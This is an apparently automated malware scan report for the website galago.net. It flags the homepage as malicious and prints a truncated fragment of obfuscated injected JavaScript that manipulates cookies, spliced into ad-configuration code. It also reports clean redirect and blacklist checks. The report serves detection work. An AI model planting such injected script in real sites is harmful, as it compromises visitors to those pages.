Scanned pages/files
Request | Server response | Status |
http://galago.net/ | 200 OK Content-Length: 10129 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy) google_ad_client = "pub-4445461225908432"; google_ad_width = 160; google_ad_height = 600; google_ad_format = "160x600_as"; google_ad_type = "text"; google_ad_channel ="8848517839"; google_color_border = "780000"; google_color_bg = "FFFFFF"; google_color_link = "780000"; google_color_url = "780000"; google_color_text = "000000";
Antivirus reports:
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19942 Content-Type: text/javascript | clean |
http://galago.net/test404page.js | 404 Not Found Content-Length: 4030 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: galago.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 08:26:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: galago.net
Referer: http://www.google.com/search?q=galago.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=galago.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://galago.net/
Result: galago.net is not infected or malware details are not published yet.